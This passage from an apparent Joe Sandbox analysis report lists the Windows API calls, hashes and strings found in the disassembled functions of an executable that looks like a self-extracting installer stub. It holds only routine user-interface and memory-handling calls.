                                                      • EnableWindow.USER32(00000000), ref: 00408C9C
                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                      • ShowWindow.USER32(00000000), ref: 00408CB3
                                                        • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                      • String ID:
                                                      • API String ID: 1057135554-0
                                                      • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                      • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                      • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                      • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                      APIs
                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                      • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                      • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                      • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                      • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                      • GetParent.USER32(?), ref: 00407418
                                                      • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                      • ClientToScreen.USER32(?,?), ref: 0040743D
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                      • GetClientRect.USER32(?,?), ref: 0040753D
                                                        • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                        • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                      • ClientToScreen.USER32(?,?), ref: 00407446
                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                      • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                      • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                      • String ID:
                                                      • API String ID: 747815384-0
                                                      • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                      • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                      • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                      • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: 0VA$SetEnvironment${\rtf
                                                      • API String ID: 613200358-2390373888
                                                      • Opcode ID: b44e7f59370a601b0eb2b729e037dec59d8e39194785ba66c3c934530fbc5d67
                                                      • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                      • Opcode Fuzzy Hash: b44e7f59370a601b0eb2b729e037dec59d8e39194785ba66c3c934530fbc5d67
                                                      • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                      • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                      • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                      • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00407831
                                                      • GetWindowLongW.USER32(00000000), ref: 00407838
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                      • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                      • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                      • GetWindowDC.USER32(?), ref: 00407896
                                                      • GetWindowRect.USER32(?,?), ref: 004078A3
                                                      • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                      • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                      • String ID:
                                                      • API String ID: 2586545124-0
                                                      • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                      • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                      • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                      • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                        • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                      • wsprintfA.USER32 ref: 00403C31
                                                      • wsprintfA.USER32 ref: 00403C5E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$wsprintf
                                                      • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                      • API String ID: 2704270482-695273242
                                                      • Opcode ID: c48df58c78765c32bb50191d8ae9e25f1a9f38508890f025c69ef5feca28e328
                                                      • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                      • Opcode Fuzzy Hash: c48df58c78765c32bb50191d8ae9e25f1a9f38508890f025c69ef5feca28e328
                                                      • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                      APIs
                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                      • GetDlgItem.USER32(?,?), ref: 0040707A
                                                      • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                      • GetDlgItem.USER32(?,?), ref: 0040708B
                                                      • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ItemMessageSend$Focus
                                                      • String ID:
                                                      • API String ID: 3946207451-0
                                                      • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                      • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                      • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                      • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                      • GetWindow.USER32(?,00000005), ref: 0040767B
                                                      • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Window$AddressLibraryLoadProc
                                                      • String ID: hA$SetWindowTheme$uxtheme
                                                      • API String ID: 324724604-1539679821
                                                      • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                      • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                      • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                      • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                      APIs
                                                      • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                      • GetDC.USER32(00000000), ref: 004076E7
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                      • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                      • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                      • String ID:
                                                      • API String ID: 2693764856-0
                                                      • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                      • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                      • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                      • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                      APIs
                                                      • GetDC.USER32(?), ref: 0040721C
                                                      • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                      • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                      • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                      • SelectObject.GDI32(?,?), ref: 00407266
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                      • SelectObject.GDI32(?,?), ref: 004072A7
                                                      • ReleaseDC.USER32(?,?), ref: 004072B6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                      • String ID:
                                                      • API String ID: 2466489532-0
                                                      • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                      • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                      • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                      • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                      • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                      • wsprintfW.USER32 ref: 0040821E
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                      • String ID: %d%%
                                                      • API String ID: 3753976982-1518462796
                                                      • Opcode ID: a216eac3ecc415c40cbab1f8d0e03bd7b2a4d2c6988f6979b0e2622e0ea1e2c6
                                                      • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                      • Opcode Fuzzy Hash: a216eac3ecc415c40cbab1f8d0e03bd7b2a4d2c6988f6979b0e2622e0ea1e2c6
                                                      • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                      APIs
                                                      • EndDialog.USER32(?,00000000), ref: 004083C7
                                                      • KillTimer.USER32(?,00000001), ref: 004083D8
                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                      • SuspendThread.KERNEL32(00000290), ref: 0040841B
                                                      • ResumeThread.KERNEL32(00000290), ref: 00408438
                                                      • EndDialog.USER32(?,00000000), ref: 0040845A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: DialogThreadTimer$KillResumeSuspend
                                                      • String ID:
                                                      • API String ID: 4151135813-0
                                                      • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                      • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                      • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                      • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: %%M/$%%M\
                                                      • API String ID: 613200358-4143866494
                                                      • Opcode ID: 68271e494a0f74d8ecbf9e29a3c3c223af6f24d95afb8dee3d6b1d7d1fe2bc06
                                                      • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                      • Opcode Fuzzy Hash: 68271e494a0f74d8ecbf9e29a3c3c223af6f24d95afb8dee3d6b1d7d1fe2bc06
                                                      • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: %%T/$%%T\
                                                      • API String ID: 613200358-2679640699
                                                      • Opcode ID: d9a5077886a71a0ca53f1ec6eb52c341c976c403826948e12c551841c6c58d67
                                                      • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                      • Opcode Fuzzy Hash: d9a5077886a71a0ca53f1ec6eb52c341c976c403826948e12c551841c6c58d67
                                                      • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
